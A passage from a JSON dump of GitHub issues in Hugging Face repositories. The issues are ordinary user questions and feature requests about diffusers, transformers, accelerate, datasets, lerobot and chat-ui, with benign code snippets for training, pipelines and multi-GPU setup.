\r\nBut for the img2img scenario, is there any equivalent KDiffusion pipeline?\r\n\r\nI'm also trying to implement this by merging `StableDiffusionKDiffusionPipeline` and `StableDiffusionImg2ImgPipeline` together.\r\nAny clarification and help is appreciated.\n\n### Open source status\n\n- [ ] The model implementation is available.\n- [ ] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\n_No response_", "url": "https://github.com/huggingface/diffusers/issues/10050", "state": "open", "labels": [ "stale" ], "created_at": "2024-11-29T07:47:11Z", "updated_at": "2024-12-29T15:03:05Z", "comments": 2, "user": "juju812" }, { "repo": "huggingface/diffusers", "number": 10043, "title": "F5-TTS Integration", "body": "### Model/Pipeline/Scheduler description\n\nF5-TTS is a fully non-autoregressive text-to-speech system based on flow matching with Diffusion Transformer (DiT).\r\nIt has excellent voice cloning capabilities, and audio generation is of quite high quality.\n\n### Open source status\n\n- [X] The model implementation is available.\n- [X] The model weights are available (Only relevant if addition is not a scheduler).\n\n### Provide useful links for the implementation\n\nPaper - https://arxiv.org/abs/2410.06885\r\nCode - https://github.com/SWivid/F5-TTS?tab=readme-ov-file\r\nWeights - https://huggingface.co/SWivid/F5-TTS\r\n\r\nAuthor - @SWivid", "url": "https://github.com/huggingface/diffusers/issues/10043", "state": "open", "labels": [ "help wanted", "contributions-welcome" ], "created_at": "2024-11-28T11:14:18Z", "updated_at": "2025-11-02T18:46:02Z", "comments": 11, "user": "nityanandmathur" }, { "repo": "huggingface/lerobot", "number": 533, "title": "How to merge multiple recorded datasets?", "body": "Hi, thank you so much for the automatic resume during data recording; sometimes unstable camera issues or other situations (e.g. not having enough time to finish recording) might cause the process to stop.\r\n\r\nI was wondering, is there any way to merge multiple recorded datasets? For instance, I have two datasets, 'cube grabbing' and 'cylinder grabbing', which were both recorded with 50 episodes each and in the same environment. Do you have a tutorial about how to merge them into a larger 100-episode dataset? \r\n\r\nBTW, another reason for merging datasets is that storage usage is extremely high before video encoding, and recording large datasets at once can be limited by storage, but merging several encoded datasets can mitigate this problem.\r\n\r\nThanks", "url": "https://github.com/huggingface/lerobot/issues/533", "state": "closed", "labels": [ "question", "dataset" ], "created_at": "2024-11-28T01:53:28Z", "updated_at": "2025-10-08T08:33:31Z", "user": "mydhui" }, { "repo": "huggingface/transformers", "number": 34981, "title": "How to Log Training Loss at Step Zero in Hugging Face Trainer or SFT Trainer?", "body": "### Feature request\n\nLog the train loss on start\r\n\r\n----\r\n\r\nI'm using the Hugging Face `Trainer` (or `SFTTrainer`) for fine-tuning, and I want to log the training loss at step 0 (before any training steps are executed). I know there's an `eval_on_start` option for evaluation, but I couldn't find a direct equivalent for training loss logging at the beginning of training.\r\n\r\nIs there a way to log the initial training loss at step zero (before any updates) using `Trainer` or `SFTTrainer`? 
Ideally, I'd like something similar to `eval_on_start`.\r\n\r\nHere's what I've tried so far:\r\n\r\n#### Solution 1: Custom Callback\r\n\r\nI implemented a custom callback to log the training loss at the start of training:\r\n\r\n\r\n```python\r\nimport wandb\r\nfrom transformers import TrainerCallback\r\n\r\nclass TrainOnStartCallback(TrainerCallback):\r\n def on_train_begin(self, args, state, control, logs=None, **kwargs):\r\n # Log training loss at step 0\r\n logs = logs or {}\r\n logs[\"train/loss\"] = None # Replace None with an initial value if available\r\n logs[\"train/global_step\"] = 0\r\n self.log(logs)\r\n\r\n def log(self, logs):\r\n print(f\"Logging at start: {logs}\")\r\n wandb.log(logs)\r\n\r\n# Adding the callback to the Trainer\r\ntrainer = SFTTrainer(\r\n model=model,\r\n tokenizer=tokenizer,\r\n train_dataset=train_dataset,\r\n eval_dataset=eval_dataset,\r\n args=training_args,\r\n optimizers=(optimizer, scheduler),\r\n callbacks=[TrainOnStartCallback()],\r\n)\r\n```\r\nThis works but feels a bit overkill. It logs metrics at the start of training before any steps.\r\n\r\n#### Solution 2: Manual Logging\r\n\r\nAlternatively, I manually log the training loss before starting training:\r\n\r\n```python\r\nimport wandb\r\n\r\nwandb.log({\"train/loss\": None, \"train/global_step\": 0})\r\ntrainer.train()\r\n```\r\n\r\n### Question:\r\n\r\nAre there any built-in features in `Trainer` or `SFTTrainer` to log the training loss at step zero? Or is a custom callback or manual logging the best solution here? If so, are there better ways to implement this functionality, similar to `eval_on_start` but as a `train_on_start`?\r\n\r\ncross: https://discuss.huggingface.co/t/how-to-log-training-loss-at-step-zero-in-hugging-face-trainer-or-sft-trainer/128188\n\n### Motivation\n\nCrucial sanity check\n\n### Your contribution\n\nYes, happy to implement this. ", "url": "https://github.com/huggingface/transformers/issues/34981", "state": "open", "labels": [ "Feature request" ], "created_at": "2024-11-28T00:24:43Z", "updated_at": "2024-11-29T07:35:28Z", "user": "brando90" }, { "repo": "huggingface/transformers.js", "number": 1055, "title": "Support for TypeScript docs", "body": "### Question\n\nI have been trying to implement server-side sentiment analysis using this [tutorial](https://huggingface.co/docs/transformers.js/main/en/tutorials/next#prerequisites), but it's in JavaScript. I looked through the docs but there seems to be no information on implementing it using TypeScript. So far I have integrated TypeScript, but there is one error that is difficult to fix. 
This is what I have implemented so far:\r\n\r\npipeline.ts\r\n```ts\r\nimport { pipeline, PipelineType } from \"@huggingface/transformers\";\r\n\r\n// Use the Singleton pattern to enable lazy construction of the pipeline.\r\n// NOTE: We wrap the class in a function to prevent code duplication (see below).\r\nconst P = () => class PipelineSingleton {\r\n static task: PipelineType = 'text-classification';\r\n static model = 'Xenova/distilbert-base-uncased-finetuned-sst-2-english';\r\n static instance: PipelineSingleton | null = null;\r\n\r\n // eslint-disable-next-line @typescript-eslint/no-unsafe-function-type\r\n static async getInstance(progress_callback: Function | undefined = undefined) {\r\n if (!this.instance) {\r\n this.instance = pipeline(this.task, this.model, { progress_callback });\r\n }\r\n return this.instance;\r\n }\r\n}\r\n\r\nlet PipelineSingleton: ReturnType<typeof P>;\r\nif (process.env.NODE_ENV !== 'production') {\r\n // When running in development mode, attach the pipeline to the\r\n // global object so that it's preserved between hot reloads.\r\n // For more information, see https://vercel.com/guides/nextjs-prisma-postgres\r\n const globalWithPipeline = global as typeof global & { PipelineSingleton: ReturnType<typeof P> };\r\n\r\n if (!globalWithPipeline.PipelineSingleton) {\r\n globalWithPipeline.PipelineSingleton = P();\r\n }\r\n\r\n PipelineSingleton = globalWithPipeline.PipelineSingleton;\r\n} else {\r\n PipelineSingleton = P();\r\n}\r\nexport default PipelineSingleton;\r\n```\r\n\r\nrequest.ts\r\n```ts\r\nimport { NextResponse } from 'next/server'\r\nimport PipelineSingleton from './pipeline';\r\n\r\nexport async function GET(request: Request) {\r\n // Extract the text parameter from the query string\r\n const url = new URL(request.url);\r\n const text = url.searchParams.get('text');\r\n if (!text) {\r\n return NextResponse.json({\r\n error: 'Missing text parameter',\r\n }, { status: 400 });\r\n }\r\n // Get the classification pipeline. When called for the first time,\r\n // this will load the pipeline and cache it for future use.\r\n const classifier = await PipelineSingleton.getInstance(); // SHOWS THE ERROR - Type 'PipelineSingleton' has no call signatures.ts(2349)\r\n\r\n // Actually perform the classification\r\n const result = await classifier(text);\r\n\r\n return NextResponse.json(result);\r\n}\r\n```\r\n\r\nThe problem is in request.ts when calling the classifier method. TypeScript shows the error: \r\n\r\n> This expression is not callable.\r\n> Type 'PipelineSingleton' has no call signatures.ts(2349)\r\n\r\n\r\nSo this probably means that my TypeScript implementation is incorrect for Pipeline. Would appreciate any help on this. TIA.", "url": "https://github.com/huggingface/transformers.js/issues/1055", "state": "open", "labels": [ "question" ], "created_at": "2024-11-26T21:38:54Z", "updated_at": "2024-11-27T02:20:59Z", "user": "SadmanYasar" }, { "repo": "huggingface/datasets", "number": 7299, "title": "Efficient Image Augmentation in Hugging Face Datasets", "body": "### Describe the bug\r\n\r\n I'm using the Hugging Face datasets library to load images in batches and would like to apply a torchvision transform to solve the inconsistent image sizes in the dataset and apply some on-the-fly image augmentation. The only approach I can think of is using the collate_fn, but that seems quite inefficient. 
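One approach worth trying here, sketched under the assumption that lazy per-batch transforms are acceptable: `datasets` supports on-the-fly transforms via `Dataset.with_transform` (or `set_transform`), which run at `__getitem__` time instead of inside the `collate_fn`. A minimal sketch (the 224x224 target size is arbitrary; column names follow the dataset used below):

```python
from datasets import load_dataset
from torch.utils.data import DataLoader
from torchvision import transforms

resize = transforms.Compose([
    transforms.Resize((224, 224)),  # unify the inconsistent image sizes
    transforms.ToTensor(),
])

def apply_transforms(examples):
    # `examples` is a batched dict of columns; 'image' holds PIL images.
    # Returning only tensor/text columns keeps the default collate happy.
    return {
        'pixel_values': [resize(img.convert('RGB')) for img in examples['image']],
        'texts': examples['text'],
    }

dataset = load_dataset('Yuki20/pokemon_caption', split='train')
dataset = dataset.with_transform(apply_transforms)  # applied lazily on access

# All images now share one shape, so the default collate_fn suffices.
dataloader = DataLoader(dataset, batch_size=4)
```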
\r\n \r\n I'm new to the Hugging Face datasets library and didn't find anything about this in the documentation or the issues here on GitHub.\r\n\r\nIs there an existing way to add image transformations directly to the dataset loading pipeline? \r\n\r\n### Steps to reproduce the bug\r\n\r\n```python\r\nfrom datasets import load_dataset\r\nfrom torch.utils.data import DataLoader\r\n\r\ndef collate_fn(batch):\r\n images = [item['image'] for item in batch]\r\n texts = [item['text'] for item in batch]\r\n return {\r\n 'images': images,\r\n 'texts': texts\r\n }\r\n\r\ndataset = load_dataset(\"Yuki20/pokemon_caption\", split=\"train\")\r\ndataloader = DataLoader(dataset, batch_size=4, collate_fn=collate_fn)\r\n\r\n# Output shows varying image sizes:\r\n# [(1280, 1280), (431, 431), (789, 789), (769, 769)]\r\n```\r\n\r\n### Expected behavior\r\n\r\nI'm looking for a way to resize images on-the-fly when loading the dataset, similar to PyTorch's Dataset.__getitem__ functionality. This would be more efficient than handling resizing in the collate_fn.\r\n\r\n\r\n### Environment info\r\n\r\n- `datasets` version: 3.1.0\r\n- Platform: Linux-6.5.0-41-generic-x86_64-with-glibc2.35\r\n- Python version: 3.11.10\r\n- `huggingface_hub` version: 0.26.2\r\n- PyArrow version: 18.0.0\r\n- Pandas version: 2.2.3\r\n- `fsspec` version: 2024.9.0\r\n", "url": "https://github.com/huggingface/datasets/issues/7299", "state": "open", "labels": [], "created_at": "2024-11-26T16:50:32Z", "updated_at": "2024-11-26T16:53:53Z", "comments": 0, "user": "fabiozappo" }, { "repo": "huggingface/lerobot", "number": 527, "title": "Is there a `select_actions` abstraction?", "body": "This line references a `select_actions` function which doesn't seem to exist. This functionality (abstracting away access to the future action queue, instead of just returning the first action) would be useful - did it use to / will it exist?\r\nhttps://github.com/huggingface/lerobot/blob/96c7052777aca85d4e55dfba8f81586103ba8f61/lerobot/common/policies/act/modeling_act.py#L102", "url": "https://github.com/huggingface/lerobot/issues/527", "state": "closed", "labels": [ "question", "policies", "stale" ], "created_at": "2024-11-26T14:22:31Z", "updated_at": "2025-10-08T08:33:51Z", "user": "genemerewether" }, { "repo": "huggingface/diffusers", "number": 10025, "title": "attention mask for transformer Flux", "body": "### Describe the bug\r\n\r\nIs it possible to get back the `attention_mask` argument in the Flux attention processor \r\n\r\n```\r\nhidden_states = F.scaled_dot_product_attention(query, key, value, dropout_p=0.0, is_causal=False,attn_mask=attention_mask)\r\n```\r\n\r\nhttps://github.com/huggingface/diffusers/blob/main/src/diffusers/models/attention_processor.py#L1910\r\n\r\nin order to tweak things a bit? 
otherwise the argument `attention_mask` is unused.\r\n\r\nThanks a lot \r\n\r\n### Reproduction\r\n\r\npip install diffusers\r\n\r\n### Logs\r\n\r\n_No response_\r\n\r\n### System Info\r\n\r\nUbuntu\r\n\r\n### Who can help?\r\n\r\n@yiyixuxu @sayakpaul @DN6 @asomoza ", "url": "https://github.com/huggingface/diffusers/issues/10025", "state": "closed", "labels": [ "bug" ], "created_at": "2024-11-26T08:51:20Z", "updated_at": "2024-12-05T00:22:37Z", "comments": 19, "user": "christopher5106" }, { "repo": "huggingface/accelerate", "number": 3263, "title": "How to load checkpoint shards one by one to avoid OOM error?", "body": "### System Info\r\n\r\n```Shell\r\n- `Accelerate` version: 1.1.0\r\n- Platform: Linux-5.10.112-005.ali5000.al8.x86_64-x86_64-with-glibc2.17\r\n- `accelerate` bash location: /home/admin/anaconda3/envs/llama_factory/bin/accelerate\r\n- Python version: 3.10.14\r\n- Numpy version: 1.26.4\r\n- PyTorch version (GPU?): 2.4.1+cu121 (True)\r\n- PyTorch XPU available: False\r\n- PyTorch NPU available: False\r\n- PyTorch MLU available: False\r\n- PyTorch MUSA available: False\r\n- System RAM: 128.00 GB\r\n- GPU type: NVIDIA H20\r\n- `Accelerate` default config:\r\n - compute_environment: LOCAL_MACHINE\r\n - distributed_type: MULTI_GPU\r\n - mixed_precision: no\r\n - use_cpu: False\r\n - debug: False\r\n - num_processes: 8\r\n - machine_rank: 0\r\n - num_machines: 1\r\n - gpu_ids: all\r\n - rdzv_backend: static\r\n - same_network: True\r\n - main_training_function: main\r\n - enable_cpu_affinity: False\r\n - downcast_bf16: no\r\n - tpu_use_cluster: False\r\n - tpu_use_sudo: False\r\n - tpu_env: []\r\n```\r\n\r\n\r\n### Information\r\n\r\n- [ ] The official example scripts\r\n- [X] My own modified scripts\r\n\r\n### Tasks\r\n\r\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\r\n- [X] My own task or dataset (give details below)\r\n\r\n### Reproduction\r\n\r\nMy code can run on 1/2/3/4 GPU(s), but errors occur when I try to use more GPUs.\r\n\r\nThe command I use :\r\n`accelerate launch --multi_gpu --gpu_ids 0,1,2,3,4,5,6,7,8 --num_processes 8 --main_process_port 2525 ./train_args_multi.py --batch_size 4 --save_name tmp_model_multi`\r\n\r\nThe code where errors occur:\r\n```\r\n accelerator = Accelerator()\r\n device = accelerator.device\r\n print('Device: ', device)\r\n\r\n model = MyModel(path=path, device=device).to(device)\r\n\r\n random.seed(seed)\r\n torch.manual_seed(seed)\r\n np.random.seed(seed)\r\n\r\n train_data, train_loader = data_provider(train_data_path, batch_size, num_workers=num_workers, flag='train')\r\n test_data, test_loader = data_provider(test_data_path, batch_size, num_workers=num_workers, flag='test')\r\n \r\n model_optim = optim.Adam(trained_parameters, lr=learning_rate)\r\n \r\n print('Preparing for accelerator...')\r\n model, model_optim, train_loader, test_loader = accelerator.prepare(model, model_optim, train_loader, test_loader)\r\n```\r\n\r\n### Expected behavior\r\n\r\nErrors occur when loading checkpoint shards (as the bar shows below):\r\n```\r\n$accelerate launch --multi_gpu --num_processes 8 --gpu_ids 0,1,2,3,4,5,6,7 --main_process_port 25252 ./train_args_multi.py --batch_size 4 --save_name tmp_model_multi\r\nDevice: cuda:0 \r\nDevice: cuda:6 \r\nLoading checkpoint shards: 0%| | 0/4 [00:00\r\n------------------------------------------------------\r\nRoot Cause (first observed failure):\r\n[0]:\r\n time : 
2024-11-26_16:17:47\r\n host : pe-resource-pool033093226243.center\r\n rank : 5 (local_rank: 5)\r\n exitcode : -9 (pid: 84403)\r\n error_file: \r\n traceback : Signal 9 (SIGKILL) received by PID 84403\r\n======================================================\r\n(llama_factory)\r\n```\r\n\r\nI found that the memory ran out (not CUDA memory) when loading the models b", "url": "https://github.com/huggingface/accelerate/issues/3263", "state": "closed", "labels": [], "created_at": "2024-11-26T08:25:37Z", "updated_at": "2025-01-06T15:06:50Z", "user": "amoyplane" }, { "repo": "huggingface/lerobot", "number": 525, "title": "Train a RL agent (without initial dataset)", "body": "Hi,\r\n\r\nI'm currently working on trying to integrate the following environment into the repo: https://github.com/perezjln/gym-lowcostrobot\r\nI would like to use it for training a RL agent in sim and try it out on the real robot afterwards.\r\nHowever, the current training script requires a local or online pre-recorded dataset. Is there a way to avoid this and pass an option not to load a dataset?\r\n\r\nThank you in advance", "url": "https://github.com/huggingface/lerobot/issues/525", "state": "closed", "labels": [ "enhancement", "question", "simulation" ], "created_at": "2024-11-25T20:02:38Z", "updated_at": "2025-04-07T16:19:01Z", "user": "alexcbb" }, { "repo": "huggingface/chat-ui", "number": 1592, "title": "Add Markdown support for user messages", "body": "## Describe your feature request\r\n\r\nIn PR #1562, a WYSIWYG editor was added to the text input area; however, when a text is sent, it is displayed in unrendered markdown. The idea is to use `marked` to conditionally render certain elements in the user's sent message into markdown, and leave others untouched.\r\n\r\nThe WYSIWYG editor currently converts the following into markdown:\r\n- bold\r\n- italic\r\n- code blocks\r\n- code spans\r\n\r\nThe sent user messages should display those specific elements converted into markdown, and leave the rest untouched and unconverted, such as headings.\r\n\r\n## Screenshots\r\n\r\nAn example of how a user message is currently displayed:\r\n\r\n![image](https://github.com/user-attachments/assets/71ab2877-28c8-4676-a06a-ac403e101fac)\r\n\r\n\r\n## Implementation idea\r\n\r\nThe idea is to create a custom `renderer`, which might be done using `marked`, to be used when the message sender is the `user`. \r\n\r\nThe renderer allows certain modifications, such as explicitly specifying what it should and should not convert, something like:\r\n\r\n```typescript\r\n\tconst renderer = new marked.Renderer();\r\n\r\n\trenderer.list = (body, _ordered) => {\r\n\t\treturn body;\r\n\t};\r\n\trenderer.heading = (text: string, _level: number) => {\r\n\t\treturn text;\r\n\t};\r\n\t// continue to disable unwanted features\r\n\r\n\t// enable what we need\r\n\trenderer.code = (code: string) => `
<pre><code>${code}</code></pre>
`;\r\n\trenderer.codespan = (text: string) => `<code>${text}</code>`;\r\n\trenderer.strong = (text: string) => `<strong>${text}</strong>`;\r\n\trenderer.em = (text: string) => `<em>${text}</em>`;\r\n```\r\n\r\nHowever, any other implementation ideas are welcome!\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1592", "state": "open", "labels": [ "enhancement" ], "created_at": "2024-11-25T17:26:10Z", "updated_at": "2024-11-27T20:42:19Z", "comments": 2, "user": "Mounayer" }, { "repo": "huggingface/accelerate", "number": 3260, "title": "How to Properly Resume Multi-GPU Training with accelerate launch Without OOM or Loss Issues?", "body": "I encountered an issue while running multi-GPU training using `accelerate launch`. I am using 4 GPUs for training, and during the process, I save my model state using:\r\n\r\n```python\r\naccelerator.save_state(state_path)\r\n```\r\n\r\nLater, I attempt to resume training by loading the model parameters with:\r\n\r\n```python\r\naccelerator.load_state(state_path)\r\n```\r\n\r\nHowever, when I start training again, I observe multiple strange processes on the first GPU, which causes an OOM (out of memory) error, as shown in the attached figure.\r\n\r\nTo address this, I tried adding a main-process guard before:\r\n\r\n```python\r\naccelerator.load_state(state_path)\r\n```\r\n\r\nThe updated code looks like this:\r\n\r\n```python\r\nif self.accelerator.is_main_process:\r\n self.accelerator.load_state(state_path)\r\n```\r\n\r\nI then used:\r\n\r\n```python\r\naccelerator.wait_for_everyone()\r\n```\r\n\r\nafterward to synchronize the model state across all four GPUs. While this resolved the issue of multiple processes on the first GPU, the model's loss increases significantly. It seems that the trained weights are not being properly synchronized across all GPUs.\r\n\r\nCould anyone please suggest how to correctly resume training in a multi-GPU setup with `accelerate launch`, ensuring the model weights are properly loaded and synchronized across all devices? Thank you!\r\n\r\n![\u5fae\u4fe1\u56fe\u7247_20241124170918](https://github.com/user-attachments/assets/b83375b8-6da2-4b70-b7ed-2c6b6c110825)\r\n![\u5fae\u4fe1\u56fe\u7247_20241124170833](https://github.com/user-attachments/assets/b0aad650-083e-418d-bdd7-60f8e485d7bd)\r\n", "url": "https://github.com/huggingface/accelerate/issues/3260", "state": "closed", "labels": [], "created_at": "2024-11-25T17:19:06Z", "updated_at": "2025-05-29T10:26:13Z", "user": "tqxg2018" }, { "repo": "huggingface/chat-ui", "number": 1589, "title": "Models using OpenAI endpoint have caching enabled", "body": "When using models that are currently using the OpenAI endpoint type on HuggingChat (Nemotron, llama 3.2, qwen coder) they seem to have caching enabled. \n\nThis means retrying will just reload the previous response extremely quickly. This is not the intended behaviour and does not match what is happening when using the TGI endpoint.\n ", "url": "https://github.com/huggingface/chat-ui/issues/1589", "state": "closed", "labels": [ "huggingchat" ], "created_at": "2024-11-25T12:47:01Z", "updated_at": "2025-03-12T12:56:00Z", "comments": 1, "user": "nsarrazin" }, { "repo": "huggingface/diffusers", "number": 10004, "title": "how to use kohya sd-scripts flux loras with text encoder keys in diffusers?", "body": "The LoRA weights that result from setting train text encoder to true are incompatible with diffusers' load_lora_weights. 
The script networks/convert_flux_lora.py does not convert the text encoder keys either.", "url": "https://github.com/huggingface/diffusers/issues/10004", "state": "open", "labels": [ "contributions-welcome" ], "created_at": "2024-11-23T20:54:30Z", "updated_at": "2025-03-16T15:39:25Z", "user": "neuron-party" }, { "repo": "huggingface/transformers.js", "number": 1050, "title": "How to lengthen the Whisper max audio length?", "body": "### Question\n\nI'm working from the [webgpu-whisper](https://github.com/huggingface/transformers.js/tree/main/examples/webgpu-whisper) demo, and I'm having a hard time lengthening the maximum audio input allowed. I made the following changes:\r\n```js\r\n-const MAX_AUDIO_LENGTH = 30; // seconds\r\n+const MAX_AUDIO_LENGTH = 120; // seconds\r\n\r\n-const MAX_NEW_TOKENS = 64;\r\n+const MAX_NEW_TOKENS = 624;\r\n```\r\n\r\nThis seems to allow for longer input, but after 30 seconds I get the following error:\r\n```\r\nAttempting to extract features for audio longer than 30 seconds. If using a pipeline to extract transcript from a long audio clip, remember to specify `chunk_length_s` and/or `stride_length_s`.\r\n```\r\n\r\nI can't seem to find where to add [stride_length_s](https://huggingface.co/docs/transformers.js/main/en/api/pipelines#pipelinesautomaticspeechrecognitionpipelinetype--code-promise--automaticspeechrecognitionoutputarray--automaticspeechrecognitionoutput----code) in the demo code, however. Could someone point me in the right direction?", "url": "https://github.com/huggingface/transformers.js/issues/1050", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-22T17:50:50Z", "updated_at": "2024-11-26T03:59:03Z", "user": "stinoga" }, { "repo": "huggingface/diffusers", "number": 9996, "title": "Flux.1 cannot load standard transformer in nf4", "body": "### Describe the bug\n\nLoading different Flux transformer models is fine, except for nf4.\r\nIt works for the 1% of fine-tunes provided on Hugging Face, but it doesn't work for the 99% of standard fine-tunes available on CivitAI.\r\n\r\nexample of such model: \r\n\r\n*note* I'm using `FluxTransformer2DModel` directly as it's easiest for reproduction, plus the majority of Flux fine-tunes are provided as transformer-only, not full models. 
but where full model does exist, its exactly the same problem using `FluxPipeline`\n\n### Reproduction\n\n```py\r\nimport torch\r\nimport bitsandbytes as bnb\r\nimport diffusers\r\n\r\nprint(f'torch=={torch.__version__} diffusers=={diffusers.__version__} bnb=={bnb.__version__}')\r\nkwargs = { 'low_cpu_mem_usage': True, 'torch_dtype': torch.bfloat16, 'cache_dir': '/mnt/models/huggingface' }\r\nfiles = [\r\n 'flux-c4pacitor_v2alpha-f1s-bf16.safetensors',\r\n 'flux-iniverse_v2-f1d-fp8.safetensors',\r\n 'flux-copax_timeless_xplus_mix2-nf4.safetensors',\r\n]\r\n\r\nfor f in files:\r\n print(f)\r\n try:\r\n transformer = diffusers.FluxTransformer2DModel.from_single_file(f, **kwargs)\r\n print(transformer.__class__)\r\n except Exception as e:\r\n print(e)\r\n transformer = None\r\n torch.cuda.empty_cache()\r\n```\n\n### Logs\n\n```shell\nin `diffusers/loaders/single_file_utils.py:convert_flux_transformer_checkpoint_to_diffusers`\r\n\r\n\r\nq, k, v, mlp = torch.split(checkpoint.pop(f\"single_blocks.{i}.linear1.weight\"), split_size, dim=0)\r\n\r\n\r\n> RuntimeError: split_with_sizes expects split_sizes to sum exactly to 33030144 (input tensor's size at dimension 0), but got split_sizes=[3072, 3072, 3072, 12288]\n```\n\n\n### System Info\n\ntorch==2.5.1+cu124 diffusers==0.32.0.dev0 bnb==0.44.1\n\n### Who can help?\n\n@yiyixuxu @sayakpaul @DN6 @asomoza", "url": "https://github.com/huggingface/diffusers/issues/9996", "state": "open", "labels": [ "bug", "wip" ], "created_at": "2024-11-22T16:55:11Z", "updated_at": "2024-12-28T19:56:54Z", "comments": 16, "user": "vladmandic" }, { "repo": "huggingface/diffusers", "number": 9990, "title": "How to diagnose problems in training custom inpaint model", "body": "### Discussed in https://github.com/huggingface/diffusers/discussions/9989\r\n\r\n
\r\n\r\nOriginally posted by **Marquess98** November 22, 2024\r\nWhat I want to do is to perform image inpainting when the input is a set of multimodal images, using sdxl as the pre-trained model. But the results are very poor now, and I cannot determine whether it is a problem with the code, dataset, pre-trained model, or training parameters. \r\nThe inference code snippet is as follows:\r\n\r\n noise_scheduler = DDIMScheduler.from_pretrained(\"stable-diffusion-v1-5/stable-diffusion-v1-5\", subfolder=\"scheduler\")\r\n noise_scheduler.set_timesteps(denoise_steps, device=device)\r\n\r\n zi = vae.encode(masked_image).latent_dist.sample()\r\n # zi = vae.encode(masked_image).latent_dist.sample()\r\n zi = zi * vae.config.scaling_factor\r\n \r\n zd = vae.encode(img2).latent_dist.sample()\r\n zd = zd * vae.config.scaling_factor\r\n\r\n zi_m = vae.encode(masked_image).latent_dist.sample()\r\n zi_m = zi_m * vae.config.scaling_factor\r\n\r\n noise = torch.randn_like(zi)\r\n denoise_steps = torch.tensor(denoise_steps,dtype=torch.int32,device=device)\r\n timesteps_add, _ = get_timesteps(noise_scheduler, denoise_steps, 1.0, device, denoising_start=None)\r\n start_step = 5\r\n\r\n zi_t = noise_scheduler.add_noise(zi, noise, timesteps_add[start_step]) \r\n # mask = mask.unsqueeze(1)\r\n m = F.interpolate(mask.to(zi.dtype), size=(zi.shape[2], zi.shape[3]), \r\n mode='bilinear', align_corners=False)\r\n\r\n input_ids = dataset[\"prompt_ids\"].to(device)\r\n input_ids = input_ids.unsqueeze(0)\r\n encoder_hidden_states = text_encoder(input_ids, return_dict=False)[0]\r\n\r\n timesteps = noise_scheduler.timesteps\r\n iterable = tqdm(\r\n enumerate(timesteps),\r\n total=len(timesteps),\r\n leave=False,\r\n desc=\" \" * 4 + \"Diffusion denoising\",\r\n )\r\n # iterable = enumerate(timesteps)\r\n start_step = 1\r\n # -----------------------denoise------------------------\r\n for i, t in iterable:\r\n if i >= start_step:\r\n unet_input = torch.cat([zi_t, zi_m, zd, m], dim=1) \r\n with torch.no_grad():\r\n noise_pred = unet(unet_input, t, \r\n encoder_hidden_states)[0]\r\n zi_t = noise_scheduler.step(noise_pred, t, zi_t).prev_sample\r\n\r\n # torch.cuda.empty_cache()\r\n decode_rgb = vae.decode(zi_t / vae.config.scaling_factor)\r\n decode_rgb = decode_rgb['sample'].squeeze()\r\n\r\nAnd the results of different start_steps are as follows [0, 5, 15 respectively]:\r\n![frame_000940_pred_ddim_st_0](https://github.com/user-attachments/assets/31012f83-c477-4284-88bf-5b30077cb4d3)\r\n![frame_000940_pred_ddim_st_5](https://github.com/user-attachments/assets/bdea4e07-ab06-4ba9-a429-7546d7df06cb)\r\n![frame_000940_pred_ddim_st_15](https://github.com/user-attachments/assets/9f8f3eff-3589-4b82-8553-33e1b084da34)\r\n\r\nAnother weird thing is that the decode_rgb range is about [-2, 2]. Shouldn't its range be [-1, 1]?\r\nCurrently, I think the problem may lie in either the inference code or the scale of the dataset (about 5000 image sets so far). Can someone guide me on how to determine which part the problem is in? \r\nAny suggestions and ideas will be greatly appreciated !!!!
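On the [-2, 2] range question above: a hedged sketch of the standard post-processing that diffusers pipelines apply after `vae.decode` (the decoder output is nominally in [-1, 1] but is not clamped, so some overshoot is expected):

```python
import torch

def decoded_to_unit_range(decode_rgb: torch.Tensor) -> torch.Tensor:
    # Rescale the nominal [-1, 1] decoder output to [0, 1] and clip the
    # overshoot; this mirrors the post-processing diffusers pipelines do
    # after vae.decode() before converting the result to a viewable image.
    return (decode_rgb / 2 + 0.5).clamp(0, 1)

# Usage with the names from the snippet above (assumed, for illustration):
# rgb = decoded_to_unit_range(vae.decode(zi_t / vae.config.scaling_factor).sample)
```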
", "url": "https://github.com/huggingface/diffusers/issues/9990", "state": "closed", "labels": [], "created_at": "2024-11-22T03:16:50Z", "updated_at": "2024-11-23T13:37:53Z", "user": "Marquess98" }, { "repo": "huggingface/Google-Cloud-Containers", "number": 123, "title": "Querying PaliGemma VLMs", "body": "My collaborators and I are trying to use your very useful containers to deploy and use Google's PaliGemma models on GCS/Vertex. I was wondering what is the best way to query the model with images, especially if the images are stored locally? I see that there is an [example showing this for Llama Vision](https://github.com/huggingface/Google-Cloud-Containers/blob/main/examples/vertex-ai/notebooks/deploy-llama-vision-on-vertex-ai/vertex-notebook.ipynb) but it seems like you have to pass in the images as urls which may not be feasible for us..\r\n\r\nWe're getting some success by doing something like this, but unsure if that's the right way:\r\n\r\n```py\r\n\r\nimage_path = \"/PATH/rabbit.png\"\r\n\r\nwith open(image_path, \"rb\") as f:\r\n image = base64.b64encode(f.read()).decode(\"utf-8\")\r\n\r\nimage = f\"data:image/png;base64,{image}\"\r\n\r\noutput = deployed_model.predict(\r\n instances=[\r\n {\r\n \"inputs\":f\"![]({image})What is the animal wearing?\",\r\n \"parameters\":{\"max_new_tokens\": 100, \"do_sample\": False}\r\n }\r\n ]\r\n)\r\n#> space suit\r\n```\r\n\r\nPlease let me know if you need more details! Any assistance would be much appreciated!", "url": "https://github.com/huggingface/Google-Cloud-Containers/issues/123", "state": "closed", "labels": [ "question" ], "created_at": "2024-11-21T14:52:41Z", "updated_at": "2024-12-04T16:31:01Z", "user": "kanishkamisra" }, { "repo": "huggingface/diffusers", "number": 9983, "title": "Using StableDiffusionControlNetImg2ImgPipeline Enable_vae_tiling(), seemingly fixed the patch is 512 x 512, where should I set the relevant parameters", "body": "```\r\npipe.scheduler = UniPCMultistepScheduler.from_config(pipe.scheduler.config)\r\npipe = pipe.to(\"cuda\")\r\nprompt = \"a beautiful landscape photograph\"\r\npipe.enable_vae_tiling()\r\n```", "url": "https://github.com/huggingface/diffusers/issues/9983", "state": "closed", "labels": [], "created_at": "2024-11-21T09:21:24Z", "updated_at": "2024-12-02T08:32:52Z", "user": "reaper19991110" }, { "repo": "huggingface/datatrove", "number": 305, "title": "How 